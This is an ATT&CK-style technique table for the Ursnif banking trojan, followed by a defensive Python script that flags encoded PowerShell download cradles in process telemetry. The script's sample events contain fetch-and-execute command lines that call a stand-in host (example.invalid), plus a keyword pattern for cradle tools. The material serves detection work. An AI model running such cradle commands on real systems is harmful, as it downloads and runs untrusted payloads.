Ursnif is a banking trojan and variant of the Gozi malware observed being spread through various automated exploit kits, Spearphishing Attachments, and malicious links.[1][2] Ursnif is associated primarily with data theft, but variants also include components (backdoors, spyware, file injectors, etc.) capable of a wide variety of behaviors.[3]
| Domain | ID | Name | Use |
|---|---|---|---|
| Enterprise | T1047 | Windows Management Instrumentation | Ursnif droppers have used WMI classes to execute PowerShell commands.[5] |
| Enterprise | T1005 | Data from Local System | Ursnif has collected files from victim machines, including certificates and cookies.[6] |
| Enterprise | T1090.003 | Proxy: Multi-hop Proxy | |
| Enterprise | T1036.005 | Masquerading: Match Legitimate Name or Location | Ursnif has used strings from legitimate system files and existing folders for its file, folder, and Registry entry names.[3] |
| Enterprise | T1112 | Modify Registry | Ursnif has used Registry modifications as part of its installation routine.[6][2] |
| Enterprise | T1543.003 | Create or Modify System Process: Windows Service | Ursnif has registered itself as a system service in the Registry for automatic execution at system startup.[7] |
| Enterprise | T1568.002 | Dynamic Resolution: Domain Generation Algorithms | |
| Enterprise | T1140 | Deobfuscate/Decode Files or Information | Ursnif has used crypto key information stored in the Registry to decrypt Tor clients dropped to disk.[2] |
| Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Ursnif has used Registry Run keys to establish automatic execution at system startup.[7][6] |
| Enterprise | T1059.001 | Command and Scripting Interpreter: PowerShell | Ursnif droppers have used PowerShell in download cradles to download and execute the malware's full executable payload.[5] |
| Enterprise | T1059.005 | Command and Scripting Interpreter: Visual Basic | Ursnif droppers have used VBA macros to download and execute the malware's full executable payload.[5] |
| Enterprise | T1113 | Screen Capture | |
| Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | |
| Enterprise | T1074.001 | Data Staged: Local Data Staging | |
| Enterprise | T1132 | Data Encoding | |
| Enterprise | T1106 | Native API | Ursnif has used |
| Enterprise | T1012 | Query Registry | Ursnif has used Reg to query the Registry for installed programs.[3][6] |
| Enterprise | T1080 | Taint Shared Content | Ursnif has copied itself to and infected files in network drives for propagation.[3][8] |
| Enterprise | T1185 | Browser Session Hijacking | Ursnif has injected HTML code into banking sites to steal sensitive online banking information (e.g., usernames and passwords).[6] |
| Enterprise | T1027.010 | Obfuscated Files or Information: Command Obfuscation | Ursnif droppers execute base64-encoded PowerShell commands.[5] |
| Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | Ursnif has used an XOR-based algorithm to encrypt Tor clients dropped to disk.[2] Ursnif droppers have also been delivered as password-protected zip files that execute base64-encoded PowerShell commands.[5] |
| Enterprise | T1070.004 | Indicator Removal: File Deletion | Ursnif has deleted data staged in temporary files after exfiltration.[3] |
| Enterprise | T1082 | System Information Discovery | Ursnif has used Systeminfo to gather system information.[3] |
| Enterprise | T1007 | System Service Discovery | |
| Enterprise | T1497.003 | Virtualization/Sandbox Evasion: Time Based Evasion | Ursnif has used a 30-minute delay after execution to evade sandbox monitoring tools.[8] |
| Enterprise | T1105 | Ingress Tool Transfer | Ursnif has dropped payload and configuration files to disk. Ursnif has also been used to download and execute additional payloads.[7][6] |
| Enterprise | T1056.004 | Input Capture: Credential API Hooking | Ursnif has hooked APIs to perform a wide variety of information theft, such as monitoring traffic from browsers.[3] |
| Enterprise | T1057 | Process Discovery | Ursnif has gathered information about running processes.[3][6] |
| Enterprise | T1055.005 | Process Injection: Thread Local Storage | Ursnif has injected code into target processes via thread local storage callbacks.[3][7][4] |
| Enterprise | T1055.012 | Process Injection: Process Hollowing | Ursnif has used process hollowing to inject into child processes.[4] |
| Enterprise | T1559.001 | Inter-Process Communication: Component Object Model | Ursnif droppers have used COM objects to execute the malware's full executable payload.[5] |
| Enterprise | T1041 | Exfiltration Over C2 Channel | Ursnif has used HTTP POSTs to exfiltrate gathered information.[3][4][2] |
| Enterprise | T1091 | Replication Through Removable Media | Ursnif has copied itself to and infected removable drives for propagation.[3][8] |
| Enterprise | T1564.003 | Hide Artifacts: Hidden Window | Ursnif droppers have used COM properties to execute malware in hidden windows.[5] |
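The dropper chain in the table above (base64-encoded PowerShell, used as a download cradle, and launched through WMI) is a good fit for process-creation telemetry. The following is an added example of that triage logic; it is not code from the ATT&CK page or from Ursnif itself. The process-creation events, file paths and payload strings are constructed for illustration, the encoded payloads are built inline with the same UTF-16LE + base64 encoding that `-EncodedCommand` expects, and treating an Office parent process as evidence of a VBA macro launch (T1059.005) is a heuristic assumption, not something the page states.

```python
"""Triage constructed Windows process-creation events for the Ursnif dropper
pattern: base64-encoded PowerShell (T1027.010) acting as a download cradle
(T1059.001), spawned via WMI (T1047) or an Office macro (T1059.005).

Added example, not from the ATT&CK page or the Ursnif code base. Events,
paths and payloads below are constructed for illustration.
"""
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand plus the
# documented short forms -e and -ec; longest alternatives first so the regex
# prefers the full spelling when it is present.
_ENC_ALIASES = sorted({"e", "ec"} | {"encodedcommand"[:i] for i in range(2, 15)},
                      key=len, reverse=True)
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:%s)\s+([A-Za-z0-9+/=]+)" % "|".join(_ENC_ALIASES))

# Cradle indicators, matched on word boundaries so "iex" does not hit "index".
CRADLE = re.compile(
    r"(?i)\b(?:iex|invoke-expression|downloadstring|downloadfile|"
    r"invoke-webrequest|iwr|net\.webclient|start-bitstransfer)\b"
)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}  # heuristic for T1059.005


def encode_command(script: str) -> str:
    """Encode a script exactly as powershell.exe -EncodedCommand expects (UTF-16LE, base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob: str):
    """Reverse encode_command; return None for malformed base64 or odd-length data."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError are both ValueErrors
        return None


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def triage(event: dict):
    """Return a finding dict for a PowerShell event, or None if it is not PowerShell."""
    if _basename(event["image"]) not in ("powershell.exe", "pwsh.exe"):
        return None
    finding = {"decoded": None, "techniques": []}
    effective = event["command_line"]
    m = ENC_FLAG.search(effective)
    if m:
        decoded = decode_encoded_command(m.group(1))
        if decoded is not None:
            finding["decoded"] = decoded
            effective = decoded            # inspect what actually runs, not the blob
            finding["techniques"].append("T1027.010")
    if CRADLE.search(effective):
        finding["techniques"].append("T1059.001")
    parent = _basename(event["parent_image"])
    if parent == "wmiprvse.exe":            # WMI-hosted Win32_Process.Create lands here
        finding["techniques"].append("T1047")
    elif parent in OFFICE_PARENTS:          # assumed: macro-launched PowerShell
        finding["techniques"].append("T1059.005")
    return finding


def triage_events(events):
    """Map event index -> finding for every PowerShell event with at least one match."""
    out = {}
    for i, ev in enumerate(events):
        f = triage(ev)
        if f and f["techniques"]:
            out[i] = f
    return out


# Constructed sample telemetry (Sysmon-style fields, hostnames are .invalid).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "command_line": "powershell.exe -nop -enc " + encode_command(
         "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/p')")},
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -EncodedCommand " + encode_command(
         "Get-Service | Where-Object Status -eq 'Running'")},   # encoded but benign
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": 'powershell.exe -nop -c "iwr http://example.invalid/a.exe '
                     '-OutFile $env:TEMP\\a.exe; Start-Process $env:TEMP\\a.exe"'},
    {"image": r"C:\Windows\System32\notepad.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for idx, finding in triage_events(SAMPLE_EVENTS).items():
        print(idx, finding["techniques"], finding["decoded"])
```

The encoded-but-benign event still surfaces, tagged only with T1027.010; in practice the cradle match plus an unusual parent (WmiPrvSE.exe or an Office binary) is the combination worth paging on, and the decoded command should be retained in the alert so an analyst sees the URL without re-decoding.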